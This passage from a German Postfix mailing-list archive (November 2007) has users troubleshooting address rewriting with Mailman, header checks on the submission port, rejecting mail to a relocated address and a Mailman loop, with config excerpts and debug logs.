-o smtpd_client_restrictions= > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_recipient_restrictions=permit_mynetworks,reject > -o smtpd_data_restrictions= > -o mynetworks=127.0.0.0/8 > -o receive_override_options=no_unknown_recipient_checks > > maildrop unix - n n - - pipe > flags=DRhu user=vmail argv=/usr/local/bin/maildrop -d ${recipient} -w 75 > maildrop_destination_recipient_limit = 1 > > uucp unix - n n - - pipe > flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail > ($recipient) ifmail unix - n n - - pipe > flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient) > bsmtp unix - n n - - pipe > flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -d -t$nexthop -f$sender > $recipient scalemail-backend unix - n n - 2 > pipe flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store > ${nexthop} ${user} ${extension} > > smtps inet n - n - - smtpd > -o smtpd_tls_wrappermode=yes > -o smtpd_sasl_auth_enable=yes > > vhcs2-arpl unix - n n - - pipe flags= > user=vmail argv=/var/www/vhcs2/engine/messager/vhcs2-arpl-msgr > tlsmgr unix - - - 1000? 1 tlsmgr > scache unix - - - - 1 scache > discard unix - - - - - discard > > > retry unix - - n - - error > > > wo kommt Postfix drauf die Adressen umzuschreiben bzw. wo ich bohren. > Ich wüste auch nicht das ich irgendwo eine Umschreibung für Domains aktiv > hätte. -- Andreas From driessen at fblan.de Tue Nov 27 00:19:04 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 00:19:04 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um In-Reply-To: <200711262031.51456.ml@awinkelmann.de> References: <003801c83060$45508e40$0565a8c0@uwe> <200711262031.51456.ml@awinkelmann.de> Message-ID: <003d01c83082$bcc46b50$0565a8c0@uwe> Andreas Winkelmann schrieb: > > > content_filter = smtp-amavis:[127.0.0.1]:10024 > > _S_mtp-amavis ? In der Master.cf dann auch unter dem namen definiert smtp-amavis unix - - - - 2 lmtp > > > local_recipient_maps = unix:passwd.byname $alias_maps $alias_database > > > local_transport = hash:/etc/postfix/transport, local:$myorigin > > Sieht sehr merkwürdig aus. local:$myorigin habe ich mal testweise rausgenommen in der transport stehen nur Systemuser wie root meine at adresse.de postmaster meine at adresse.de noboby meine at adresse.de ... drin > > > virtual_alias_maps = hash:/var/lib/mailman/data/virtual-mailman, > > hash:/etc/postfix/virt_ali, hash:/etc/postfix/vhcs2/aliases hash:/var/lib/mailman/data/virtual-mailman # CREATED: Mon Nov 26 14:44:31 2007 fblan-hallgarten at lists.fblan.de fblan-hallgarten fblan-hallgarten-admin at lists.fblan.de fblan-hallgarten-admin fblan-hallgarten-bounces at lists.fblan.de fblan-hallgarten-bounces fblan-hallgarten-confirm at lists.fblan.de fblan-hallgarten-confirm fblan-hallgarten-join at lists.fblan.de fblan-hallgarten-join fblan-hallgarten-leave at lists.fblan.de fblan-hallgarten-leave fblan-hallgarten-owner at lists.fblan.de fblan-hallgarten-owner fblan-hallgarten-request at lists.fblan.de fblan-hallgarten-request fblan-hallgarten-subscribe at lists.fblan.de fblan-hallgarten-subscribe fblan-hallgarten-unsubscribe at lists.fblan.de fblan-hallgarten-unsubscribe # STANZA END: fblan-hallgarten ..... /etc/postfix/virt_ali Mal testweise raus da auch hier wieder Umleitungen Systemuser - virtuelle User (keine Ahnung warum ich das 2 mal drin habe hash:/etc/postfix/vhcs2/aliases stehen die Virtuellenuser alle drin mail at adresse.de mail at adresse.de keine Umschreibungen von Domainnamen keine Catchall > Die würde ich wegen der umschreib-Geschichte mal prüfen. > > > master.cf > > > > smtp inet n - - 0 20 smtpd > > -o header_checks=pcre:/etc/postfix/checks/header_smtp > > > -o smtpd_proxy_filter=localhost:10024 > > Ein proxy_filter hier ein content_filter in der main.cf. Ist das sowas wie ein > Wettstreit? Nö fremde werden bei der Einlieferung über den Proxyfilter geprüft, eigene die über den Submission kommen erst nach der Einlieferung > > > smtp-amavis unix - - - - 2 lmtp > > smtp_ auf lmtp ? Sehr verwirrend, nö das ist doch nur ein Name/ Pseudonym Amavis wird per lmtp angesprochen vorne könnte auch halligalli stehen Die mails werden immer noch umgeschrieben. Ich habe mal den debuglevel etwas höher gestellt Ab hier wird es scheinbar interesant Nov 26 23:51:15 s1 postfix/smtpd[17916]: input attribute name: (end) Nov 26 23:51:15 s1 postfix/smtpd[17916]: resolve_clnt: `' -> `fblan-feilbingert-request at lists.fblan.de' -> transp=`smtp' host=`lists.fblan.de' rcpt=`fblan-feilbingert-request at lists.fblan.de' flags= class=default Nov 26 23:51:15 s1 postfix/smtpd[17916]: ctable_locate: install entry key fblan-feilbingert-request at lists.fblan.de Nov 26 23:51:15 s1 postfix/smtpd[17916]: extract_addr: in: , result: fblan-feilbingert-request at lists.fblan.de Nov 26 23:51:15 s1 postfix/smtpd[17916]: send attr request = rewrite Nov 26 23:51:15 s1 postfix/smtpd[17916]: send attr rule = local Nov 26 23:51:15 s1 postfix/smtpd[17916]: send attr address = "" ... Nov 26 23:51:15 s1 postfix/smtpd[17916]: maps_find: virtual_alias_maps: hash:/var/lib/mailman/data/virtual-mailman(0,lock|fold_fix): fblan-feilbingert-request at lists.fblan.de = fblan-feilbingert-request Nov 26 23:51:15 s1 postfix/smtpd[17916]: mail_addr_find: fblan-feilbingert-request at lists.fblan.de -> fblan-feilbingert-request Also gefunden wird diese Adresse Nov 26 23:51:15 s1 postfix/smtpd[17916]: smtpd_check_rewrite: trying: permit_inet_interfaces Nov 26 23:51:15 s1 postfix/smtpd[17916]: permit_inet_interfaces: unknown 193.158.37.226 Nov 26 23:51:15 s1 postfix/smtpd[17916]: before input_transp_cleanup: cleanup flags = enable_header_body_filter enable_automatic_bcc enable_address_mapping enable_milters Nov 26 23:51:15 s1 postfix/smtpd[17916]: after input_transp_cleanup: cleanup flags = enable_header_body_filter enable_automatic_bcc enable_address_mapping Nov 26 23:51:15 s1 postfix/smtpd[17916]: connect to subsystem public/cleanup Nov 26 23:51:15 s1 postfix/smtpd[17916]: public/cleanup socket: wanted attribute: queue_id Nov 26 23:51:15 s1 postfix/smtpd[17916]: input attribute name: queue_id Nov 26 23:51:15 s1 postfix/smtpd[17916]: input attribute value: D1B8182C278 Nov 26 23:51:15 s1 postfix/smtpd[17916]: public/cleanup socket: wanted attribute: (list terminator) Nov 26 23:51:15 s1 postfix/smtpd[17916]: input attribute name: (end) Nov 26 23:51:15 s1 postfix/smtpd[17916]: send attr flags = 50 Nov 26 23:51:15 s1 postfix/smtpd[17916]: D1B8182C278: client=unknown[193.158.37.226], sasl_method=LOGIN, sasl_username=andibl at fblan.de Nov 26 23:51:15 s1 postfix/smtpd[17916]: > unknown[193.158.37.226]: 250 2.1.5 Ok Nov 26 23:51:15 s1 postfix/smtpd[17916]: watchdog_pat: 0x80a7f58 Nov 26 23:51:15 s1 postfix/smtpd[17916]: < unknown[193.158.37.226]: DATA Nov 26 23:51:15 s1 postfix/smtpd[17916]: >>> START Data command RESTRICTIONS <<< Nov 26 23:51:15 s1 postfix/smtpd[17916]: generic_checks: name=reject_multi_recipient_bounce Nov 26 23:51:15 s1 postfix/smtpd[17916]: generic_checks: name=reject_multi_recipient_bounce status=0 Nov 26 23:51:15 s1 postfix/smtpd[17916]: generic_checks: name=reject_unauth_pipelining Nov 26 23:51:15 s1 postfix/smtpd[17916]: reject_unauth_pipelining: DATA Nov 26 23:51:15 s1 postfix/smtpd[17916]: generic_checks: name=reject_unauth_pipelining status=0 Nov 26 23:51:15 s1 postfix/smtpd[17916]: >>> END Data command RESTRICTIONS <<< Nov 26 23:51:15 s1 postfix/smtpd[17916]: > unknown[193.158.37.226]: 354 End data with . Nov 26 23:51:15 s1 postfix/cleanup[17920]: D1B8182C278: message-id=<003c01c8307e$d87296a0$0565a8c0 at uwe> Nov 26 23:51:16 s1 postfix/smtpd[17916]: public/cleanup socket: wanted attribute: status Nov 26 23:51:16 s1 postfix/smtpd[17916]: input attribute name: status Nov 26 23:51:16 s1 postfix/smtpd[17916]: input attribute value: 0 Nov 26 23:51:16 s1 postfix/smtpd[17916]: public/cleanup socket: wanted attribute: reason Nov 26 23:51:16 s1 postfix/smtpd[17916]: input attribute name: reason Nov 26 23:51:16 s1 postfix/smtpd[17916]: input attribute value: (end) Nov 26 23:51:16 s1 postfix/smtpd[17916]: public/cleanup socket: wanted attribute: (list terminator) Nov 26 23:51:16 s1 postfix/smtpd[17916]: input attribute name: (end) Nov 26 23:51:16 s1 postfix/smtpd[17916]: > unknown[193.158.37.226]: 250 2.0.0 Ok: queued as D1B8182C278 Nov 26 23:51:16 s1 postfix/smtpd[17916]: watchdog_pat: 0x80a7f58 Nov 26 23:51:16 s1 postfix/qmgr[17903]: D1B8182C278: from=, size=2587, nrcpt=1 (queue active) Nov 26 23:51:16 s1 postfix/smtpd[17923]: connect from localhost.localdomain[127.0.0.1] Nov 26 23:51:16 s1 postfix/smtpd[17923]: 2D57982C2B6: client=localhost.localdomain[127.0.0.1] Nov 26 23:51:16 s1 postfix/cleanup[17920]: 2D57982C2B6: message-id=<003c01c8307e$d87296a0$0565a8c0 at uwe> Nov 26 23:51:16 s1 postfix/qmgr[17903]: 2D57982C2B6: from=, size=3080, nrcpt=1 (queue active) Nov 26 23:51:16 s1 postfix/smtpd[17923]: disconnect from localhost.localdomain[127.0.0.1] Nov 26 23:51:16 s1 amavis[29621]: (29621-10) Passed, -> , quarantine elG53nnR0m5L, Message-ID: <003c01c8307e$d87296a0$0565a8c0 at uwe>, Hits: -1.44 Hier plötzlich zu Amavis oder ist das von Amavis zurück ? eine andere @fblan.de statt @lists.fblan.de Nov 26 23:51:16 s1 postfix/lmtp[17921]: D1B8182C278: to=, orig_to=, relay=127.0.0.1[127.0.0.1]:10024, delay=0.48, delays=0.17/0.01/0.01/0.29, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 2D57982C2B6) Nov 26 23:51:16 s1 postfix/qmgr[17903]: D1B8182C278: removed Nov 26 23:51:16 s1 postfix/virtual[17924]: 2D57982C2B6: to=, relay=virtual, delay=0.22, delays=0.11/0.01/0/0.1, dsn=5.1.1, status=bounced (unknown user: "fblan-feilbingert-request at fblan.de") Nov 26 23:51:16 s1 postfix/cleanup[17920]: 63D9282C278: message-id=<20071126225116.63D9282C278 at mail.fblan.de> Wo habe ich da nur den Bock geschossen Kann auch das gesamte debug posten Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Tue Nov 27 02:34:05 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 02:34:05 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um In-Reply-To: <003d01c83082$bcc46b50$0565a8c0@uwe> References: <003801c83060$45508e40$0565a8c0@uwe><200711262031.51456.ml@awinkelmann.de> <003d01c83082$bcc46b50$0565a8c0@uwe> Message-ID: <004901c83095$99299a40$0565a8c0@uwe> Erledigt Lt Beschreibung soll man so vorgehen # To configure a virtual domain to connect to mailman, edit Postfix thusly: # # /etc/postfix/main.cf: # relay_domains = ... lists.example.com Das eingetragen # transport_maps = hash:/etc/postfix/transport Das alleine scheint in meiner Konfig nicht zu funktionieren wobei ich immer noch nicht dahinter gekommen bin warum umgeschrieben wurde. Nachdem ich dann in der main.cf noch local_transport = hash:/etc/postfix/mailman, hash:/etc/postfix/transport gesetzt hatte, funktioniert es so wie ich denke dass es funktionieren sollte # mailman_destination_recipient_limit = 1 # # /etc/postfix/master.cf # mailman unix - n n - - pipe # flags=FR user=list # argv=/var/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${mailbox} Hier waren Zeilen verutscht # # /etc/postfix/transport: # lists.example.com mailman: Dafür habe ich eine eigene Datei mailman gemacht # # /etc/mailman/mm_cfg.py # MTA = None # No MTA alias processing required # # alias for postmaster, abuse and mailer-daemon # DEB_LISTMASTER = 'postmaster at example.com' Besten dank an alle die sich gequält haben Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Tue Nov 27 07:02:39 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Tue, 27 Nov 2007 07:02:39 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um In-Reply-To: <003d01c83082$bcc46b50$0565a8c0@uwe> References: <003801c83060$45508e40$0565a8c0@uwe> <200711262031.51456.ml@awinkelmann.de> <003d01c83082$bcc46b50$0565a8c0@uwe> Message-ID: <200711270702.39512.ml@awinkelmann.de> On Dienstag, 27. November 2007, Uwe Driessen wrote: > > > content_filter = smtp-amavis:[127.0.0.1]:10024 > > > > _S_mtp-amavis ? > > In der Master.cf dann auch unter dem namen definiert > > smtp-amavis unix - - - - 2 lmtp Ja, war auch eine Bemerkung zur Übersichtlichkeit. Ein transport der smtp im Namen hat und lmtp benutzt ist verwirrend. > > > local_recipient_maps = unix:passwd.byname $alias_maps $alias_database > > > > > > local_transport = hash:/etc/postfix/transport, local:$myorigin > > > > Sieht sehr merkwürdig aus. Postfix hat für die Optionen ein nettes Benennungsschema. Optionen, die eine map erwarten heissen auch mumble_maps. "local_transport" hat kein "maps" im Namen, trotzdem schreibst Du eine dahinter. Ich glaube nicht, dass das funktioniert. Vermutlich wird es Fehlermeldungen im Log hageln, wenn Du local_transport wirklich benutzt. > local:$myorigin habe ich mal testweise rausgenommen > in der transport stehen nur Systemuser wie > > root meine at adresse.de > postmaster meine at adresse.de > noboby meine at adresse.de > ... > drin > > > > virtual_alias_maps = hash:/var/lib/mailman/data/virtual-mailman, > > > hash:/etc/postfix/virt_ali, hash:/etc/postfix/vhcs2/aliases > > hash:/var/lib/mailman/data/virtual-mailman > > # CREATED: Mon Nov 26 14:44:31 2007 > fblan-hallgarten at lists.fblan.de fblan-hallgarten > fblan-hallgarten-admin at lists.fblan.de fblan-hallgarten-admin > fblan-hallgarten-bounces at lists.fblan.de fblan-hallgarten-bounces > fblan-hallgarten-confirm at lists.fblan.de fblan-hallgarten-confirm > fblan-hallgarten-join at lists.fblan.de fblan-hallgarten-join > fblan-hallgarten-leave at lists.fblan.de fblan-hallgarten-leave > fblan-hallgarten-owner at lists.fblan.de fblan-hallgarten-owner > fblan-hallgarten-request at lists.fblan.de fblan-hallgarten-request > fblan-hallgarten-subscribe at lists.fblan.de fblan-hallgarten-subscribe > fblan-hallgarten-unsubscribe at lists.fblan.de fblan-hallgarten-unsubscribe > # STANZA END: fblan-hallgarten > ..... Das schreibt die Adressen um. "user at domain.tld" auf "user" hängt an "user" den $myorigin an, was bei Dir "fblan.de" ist. > /etc/postfix/virt_ali > Mal testweise raus da auch hier wieder Umleitungen Systemuser - virtuelle > User (keine Ahnung warum ich das 2 mal drin habe > > hash:/etc/postfix/vhcs2/aliases > > stehen die Virtuellenuser alle drin > > mail at adresse.de mail at adresse.de keine Umschreibungen von Domainnamen > keine Catchall > > > Die würde ich wegen der umschreib-Geschichte mal prüfen. > > > > > master.cf > > > > > > smtp inet n - - 0 20 smtpd > > > -o header_checks=pcre:/etc/postfix/checks/header_smtp > > > > > > -o smtpd_proxy_filter=localhost:10024 > > > > Ein proxy_filter hier ein content_filter in der main.cf. Ist das sowas > > wie ein Wettstreit? > > Nö fremde werden bei der Einlieferung über den Proxyfilter geprüft, eigene > die über den Submission kommen erst nach der Einlieferung War ein Hinweis zur Übersichtlichkeit und wartbarkeit der Konfiguration. > > > smtp-amavis unix - - - - 2 lmtp > > > > smtp_ auf lmtp ? Sehr verwirrend, > > nö das ist doch nur ein Name/ Pseudonym > Amavis wird per lmtp angesprochen vorne könnte auch halligalli stehen Auch Thema Übersichtlichkeit. > Die mails werden immer noch umgeschrieben. Ich habe mal den debuglevel > etwas höher gestellt > > Ab hier wird es scheinbar interesant -- Andreas From peter.bauernfeind at reba-eno.de Tue Nov 27 09:39:44 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Tue, 27 Nov 2007 09:39:44 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <200711261808.05787.ml@awinkelmann.de> References: <474AED23.10609@reba-eno.de> <200711261808.05787.ml@awinkelmann.de> Message-ID: <474BD7D0.9070702@reba-eno.de> Andreas Winkelmann schrieb: > Vielleicht solltest Du einfach sagen, was Du überhaupt willst. > Bei uns werden nur Mails an bekannte User angenommen, alle andern werden abgewiesen. Nun hat sich bei einem User die Adresse geändert und er hat seit geraumer Zeit Mails an beide Adressen bekommen. Jetzt möchte ich die alte Adresse stilllegen, aber so daß die Mails mit einem Hinweis auf die neue Adresse abgelehnt werden. Das Ganze ohne unbeteligte Dritte per Bounce zu belästigen. Mit freundlichem Gruß Peter Bauernfeind From driessen at fblan.de Tue Nov 27 10:06:50 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 10:06:50 +0100 Subject: [Postfixbuch-users] Postfix schreibt Mailadressen um In-Reply-To: <200711270702.39512.ml@awinkelmann.de> References: <003801c83060$45508e40$0565a8c0@uwe><200711262031.51456.ml@awinkelmann.de><003d01c83082$bcc46b50$0565a8c0@uwe> <200711270702.39512.ml@awinkelmann.de> Message-ID: <000601c830d4$d920bae0$0565a8c0@uwe> Andreas Winkelmann schrieb: > On Dienstag, 27. November 2007, Uwe Driessen wrote: > > > > > content_filter = smtp-amavis:[127.0.0.1]:10024 > > > > > > _S_mtp-amavis ? > > > > In der Master.cf dann auch unter dem namen definiert > > > > smtp-amavis unix - - - - 2 lmtp > > Ja, war auch eine Bemerkung zur Übersichtlichkeit. Ein transport der smtp im > Namen hat und lmtp benutzt ist verwirrend. Jap habe ich geändert, habe ich nie so gelesen > > > > > local_recipient_maps = unix:passwd.byname $alias_maps $alias_database > > > > > > > > local_transport = hash:/etc/postfix/transport, local:$myorigin > > > > > > Sieht sehr merkwürdig aus. > > Postfix hat für die Optionen ein nettes Benennungsschema. Optionen, die eine > map erwarten heissen auch mumble_maps. "local_transport" hat kein "maps" im > Namen, trotzdem schreibst Du eine dahinter. Ich glaube nicht, dass das > funktioniert. Vermutlich wird es Fehlermeldungen im Log hageln, wenn Du > local_transport wirklich benutzt. Komisch postfix hat das immer geschluckt . habs geändert Und es funktioniert immer immer noch *gg > > fblan-hallgarten-unsubscribe at lists.fblan.de fblan-hallgarten-unsubscribe > > # STANZA END: fblan-hallgarten > > ..... > > Das schreibt die Adressen um. "user at domain.tld" auf "user" hängt an "user" den > $myorigin an, was bei Dir "fblan.de" ist. Jetzt wo du es sagst. Rennt jetzt wie es soll (wollte schon immer eigene Mailinglisten haben) Alles in allem bringt Postfix so schnell nichts aus dem Tritt da funktioniert so manches was eigentlich haufenweise Fehler produzieren müsste. Und das jetzt fast ein Jahr. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mkellermann at net-com.de Tue Nov 27 10:30:03 2007 From: mkellermann at net-com.de (Matthias Kellermann) Date: Tue, 27 Nov 2007 10:30:03 +0100 Subject: [Postfixbuch-users] no_header_body_checks-Direktive will nicht Message-ID: <474BE39B.8000100@net-com.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hallo zusammen, auf einem frisch aufgesetzten FreeBSD System mit Postfix v2.4.6 habe ich Probleme mit der Direktive receive_override_option=no_header_body_checks. Diese möchte ich über den Submission Port nutzen, um unnötige Header- und Body-Checks zu vermeiden. Der Abschnitt in der master.cf sieht wie folgt aus: submission inet n - n - - smtpd -o receive_override_option=no_header_body_checks -o smtpd_sasl_auth_enable=yes -o smtpd_sender_restrictions=permit_mynetworks,reject_sender_login_mismatch -o smtpd_recipient_restrictions=permit_mynetworks,permit_sasl_authenticated,reject In der main.cf sind die Header- und Body-Checks definiert: header_checks = regexp:/usr/local/etc/postfix/header_checks body_checks = regexp:/usr/local/etc/postfix/body_checks Inhalt der Dateien: %cat /usr/local/etc/postfix/header_checks /^Received:/ HOLD %cat /usr/local/etc/postfix/body_checks (Datei ist leer) Liefere ich nun Mails über Submission ein - egal ob via SASL authentifiziert oder aus mynetworks - werden die Header-Checks trotzdem ausgeführt. Habe ich irgendwas übersehen? Eigentlich müsste es so doch funktionieren. Matthias -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHS+ObGKs4BfMPVaARAt4lAJ9YmYQvRTf8h0hmZzvQ/Cc0tVsuwQCgkLTo IK1VEWQob+9OC8R7NOqZdZg= =IQn8 -----END PGP SIGNATURE----- From ast-postfix at treibsand.com Tue Nov 27 11:10:36 2007 From: ast-postfix at treibsand.com (Axel Steiner) Date: Tue, 27 Nov 2007 11:10:36 +0100 Subject: [Postfixbuch-users] error mailer In-Reply-To: <474BD7D0.9070702@reba-eno.de> References: <474AED23.10609@reba-eno.de> <200711261808.05787.ml@awinkelmann.de> <474BD7D0.9070702@reba-eno.de> Message-ID: <575FAC43-CEA6-477F-8350-CDD088B6FF04@treibsand.com> Hi, > Bei uns werden nur Mails an bekannte User angenommen, alle andern > werden > abgewiesen. > Nun hat sich bei einem User die Adresse geändert und er hat seit > geraumer Zeit Mails an beide Adressen bekommen. Jetzt möchte ich die > alte Adresse stilllegen, aber so daß die Mails mit einem Hinweis > auf die > neue Adresse abgelehnt werden. Das Ganze ohne unbeteligte Dritte per > Bounce zu belästigen. > dafuer gibt es die relocated table (http://www.postfix.org/relocated. 5.html), allerdings erzeugt die einen Bounce. Bye, Axel From mailingliste-postfixbuch at pothe.com Tue Nov 27 11:43:57 2007 From: mailingliste-postfixbuch at pothe.com (Andreas Pothe) Date: Tue, 27 Nov 2007 11:43:57 +0100 (CET) Subject: [Postfixbuch-users] error mailer In-Reply-To: <575FAC43-CEA6-477F-8350-CDD088B6FF04@treibsand.com> References: <474AED23.10609@reba-eno.de> <200711261808.05787.ml@awinkelmann.de> <474BD7D0.9070702@reba-eno.de> <575FAC43-CEA6-477F-8350-CDD088B6FF04@treibsand.com> Message-ID: <64946.217.7.132.21.1196160237.squirrel@www.pothe.de> >> geraumer Zeit Mails an beide Adressen bekommen. Jetzt möchte ich die >> alte Adresse stilllegen, aber so daß die Mails mit einem Hinweis >> auf die >> neue Adresse abgelehnt werden. Das Ganze ohne unbeteligte Dritte per >> Bounce zu belästigen. >> > > dafuer gibt es die relocated table (http://www.postfix.org/relocated. > 5.html), > allerdings erzeugt die einen Bounce. Nein, die erzeugt einen REJECT. From sven at root2.schroederhost.de Tue Nov 27 15:05:15 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 27 Nov 2007 15:05:15 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <200711261739.35515.ml@awinkelmann.de> References: <474AA2C3.7090105@root2.schroederhost.de> <200711261739.35515.ml@awinkelmann.de> Message-ID: <474C241B.8080907@root2.schroederhost.de> Andreas Winkelmann schrieb: > On Montag, 26. November 2007, Sven Schmidt wrote: > > > In der Config. > > schon klar, nur was genau? From driessen at fblan.de Tue Nov 27 15:43:50 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 15:43:50 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474C241B.8080907@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> Message-ID: <001501c83103$ecb64410$0565a8c0@uwe> Sven Schmidt schrieb: > Andreas Winkelmann schrieb: > > On Montag, 26. November 2007, Sven Schmidt wrote: > > > > > > In der Config. > > > > > > schon klar, nur was genau? Hast du auch einen DNS Eintrag für lists1.server.de ? Einrichtung genau wie in der Beschreibung ? Neue Liste usw. schon angelegt ? mm_cfg.py die abweichenden Einträge eigentlich wie in der Beschreibung DEFAULT_EMAIL_HOST = 'lists.domain.de' DEFAULT_URL_HOST = 'lists.domain.de' add_virtualhost(DEFAULT_URL_HOST, DEFAULT_EMAIL_HOST) DEFAULT_SERVER_LANGUAGE = 'de' MTA = None # Misnomer, suppresses alias output on newlist DEB_LISTMASTER = 'postmaster at domain.de' /etc/postfix/main.cf: transport_maps = hash:/etc/postfix/mailman, hash:/etc/postfix/transport also zuerst den mailmantransport dann die anderen (firstmatch wins) ansonsten wie in der Beschreibung postfix neu starten Mailman neu starten ganz wichtig die rechte prüfen wie beschrieben (die setzt Debian nicht automatisch) sollte dann tun wie er sollte (hat mich zwar auch 24 Stunden gekostet aber man lernt immer noch dazu) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From sven at root2.schroederhost.de Tue Nov 27 16:09:18 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 27 Nov 2007 16:09:18 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <001501c83103$ecb64410$0565a8c0@uwe> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> <001501c83103$ecb64410$0565a8c0@uwe> Message-ID: <474C331E.3020304@root2.schroederhost.de> Uwe Driessen schrieb: > Hast du auch einen DNS Eintrag für lists1.server.de ? > ja > Einrichtung genau wie in der Beschreibung ? > Neue Liste usw. schon angelegt ? > ja, die Mail geht auch ins Postfix rein. > mm_cfg.py die abweichenden Einträge eigentlich wie in der Beschreibung > > DEFAULT_EMAIL_HOST = 'lists.domain.de' > DEFAULT_URL_HOST = 'lists.domain.de' > add_virtualhost(DEFAULT_URL_HOST, DEFAULT_EMAIL_HOST) > DEFAULT_SERVER_LANGUAGE = 'de' > MTA = None # Misnomer, suppresses alias output on newlist > DEB_LISTMASTER = 'postmaster at domain.de' > > /etc/postfix/main.cf: > > transport_maps = hash:/etc/postfix/mailman, hash:/etc/postfix/transport > Ich habe nur den einen Transport. > also zuerst den mailmantransport dann die anderen (firstmatch wins) > > ansonsten wie in der Beschreibung > postfix neu starten Mailman neu starten > > ganz wichtig die rechte prüfen wie beschrieben (die setzt Debian nicht automatisch) > für die Transport-Datei: -rw-r--r-- 1 root postfix 34 2007-11-23 15:37 transport -rw-r--r-- 1 root postfix 12288 2007-10-19 14:36 transport.db Klappt aber immer noch nicht. From sven at root2.schroederhost.de Tue Nov 27 16:19:58 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 27 Nov 2007 16:19:58 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474C331E.3020304@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> <001501c83103$ecb64410$0565a8c0@uwe> <474C331E.3020304@root2.schroederhost.de> Message-ID: <474C359E.5050509@root2.schroederhost.de> ...wobei mir aufgefallen ist, dass die Parameter für Mailman im Postfix anders vorgegebn waren in der Master.cf argv=/var/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${user} From driessen at fblan.de Tue Nov 27 16:45:09 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 16:45:09 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474C359E.5050509@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> <001501c83103$ecb64410$0565a8c0@uwe><474C331E.3020304@root2.schroederhost.de> <474C359E.5050509@root2.schroederhost.de> Message-ID: <001601c8310c$7d89f1a0$0565a8c0@uwe> Sven Schmidt schrieb: > > transport_maps = hash:/etc/postfix/mailman, hash:/etc/postfix/transport > > > Ich habe nur den einen Transport. Ich habe der Einfachheit halber einen neunen für Mailman eingerichtet > > ganz wichtig die rechte prüfen wie beschrieben (die setzt Debian nicht automatisch) > > > für die Transport-Datei: > > -rw-r--r-- 1 root postfix 34 2007-11-23 15:37 transport > -rw-r--r-- 1 root postfix 12288 2007-10-19 14:36 transport.db Nee ich meinte die Rechte innerhalb Mailman http://www.gnu.org/software/mailman/mailman-install/node9.html > ...wobei mir aufgefallen ist, dass die Parameter für Mailman im Postfix > anders vorgegebn waren in der Master.cf > > argv=/var/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${user} Da habe ich mailman unix - n n - - pipe flags=FR user=list argv=/var/lib/mailman/bin/postfix-to-mailman.py ${nexthop} ${mailbox} andere frage laufen da auch virtuelle Domain auf der Maschine oder soll da nur Mailman alleine seinen Dienst tun? Ohne virtuelle Domains http://www.gnu.org/software/mailman/mailman-install/node13.html Mit virtuellen Domain http://www.gnu.org/software/mailman/mailman-install/postfix-virtual.html Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From christian at bricart.de Tue Nov 27 17:14:17 2007 From: christian at bricart.de (Christian Bricart) Date: Tue, 27 Nov 2007 17:14:17 +0100 (CET) Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <474C331E.3020304@root2.schroederhost.de> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> <001501c83103$ecb64410$0565a8c0@uwe> <474C331E.3020304@root2.schroederhost.de> Message-ID: <56111.80.87.162.65.1196180057.squirrel@aachalon.de> Sven Schmidt wrote: > [..] > für die Transport-Datei: > > -rw-r--r-- 1 root postfix 34 